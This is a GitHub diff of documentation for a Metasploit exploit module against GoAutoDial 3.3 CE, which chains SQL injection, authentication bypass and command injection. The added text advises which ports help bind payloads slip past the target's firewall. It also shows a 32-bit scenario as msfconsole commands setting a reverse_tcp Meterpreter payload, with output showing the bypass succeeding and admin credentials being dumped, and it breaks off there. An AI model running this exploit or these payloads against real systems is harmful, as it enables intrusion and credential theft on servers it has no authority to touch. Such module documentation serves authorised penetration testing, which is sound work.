You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Copy file name to clipboardExpand all lines: documentation/modules/exploit/linux/http/goautodial_3_rce_code_injection.md
+34Lines changed: 34 additions & 0 deletions
Display the source diff
Display the rich diff
Original file line number
Diff line number
Diff line change
@@ -7,6 +7,8 @@ This module exploits a SQL injection flaw and command injection flaw within GoAu
7
7
GoAutoDial 3.3 CE (32bit and 64bit) is available for download from goautodial.org. In order to download, register a free account then download the bootable ISOs. Both ISOs have been used for the dev of this. http://goautodial.org/attachments/download/3237/goautodial-32bit-ce-3.3-final.iso.html
8
8
Refer to: https://www.exploit-db.com/exploits/36807/
9
9
10
+
NOTE: GoAutoDial heavily restricts inbound traffic via iptables rules (and uses fail2ban, as well). This can cause bind payloads to quietly fail. For bind payloads, using ports which allow inbound connections but have no service running is ideal (ports 21 and 222 fall into this category for default GoAutoDial behavior).
11
+
10
12
## Verification
11
13
12
14
- Start `msfconsole`
@@ -19,6 +21,8 @@ Refer to: https://www.exploit-db.com/exploits/36807/
19
21
20
22
## Scenarios
21
23
24
+
### Targeting 64-bit GoAutoDial
25
+
22
26
```
23
27
msf > use exploit/linux/http/goautodial_3_rce_command_injection
24
28
msf exploit(goautodial_3_rce_command_injection) > set rhost 172.16.191.150
@@ -49,3 +53,33 @@ Architecture : x64
49
53
Meterpreter : x64/linux
50
54
```
51
55
56
+
### Targeting 32-bit GoAutoDial
57
+
```
58
+
msf > use exploit/linux/http/goautodial_3_rce_command_injection
59
+
msf exploit(goautodial_3_rce_command_injection) > set lhost 10.0.2.4
60
+
lhost => 10.0.2.4
61
+
msf exploit(goautodial_3_rce_command_injection) > set rhost 10.0.2.44
62
+
rhost => 10.0.2.44
63
+
msf exploit(goautodial_3_rce_command_injection) > set payload linux/x86/meterpreter/reverse_tcp
64
+
payload => linux/x86/meterpreter/reverse_tcp
65
+
msf exploit(goautodial_3_rce_command_injection) > run
66
+
67
+
[*] Started reverse TCP handler on 10.0.2.4:4444
68
+
[*] 10.0.2.44:443 - Trying SQL injection...
69
+
[+] 10.0.2.44:443 - Authentication Bypass (SQLi) was successful
70
+
[*] 10.0.2.44:443 - Dumping admin password...
71
+
[+] 10.0.2.44:443 - Found credentials: admin|newpassword|Admin|||Y
0 commit comments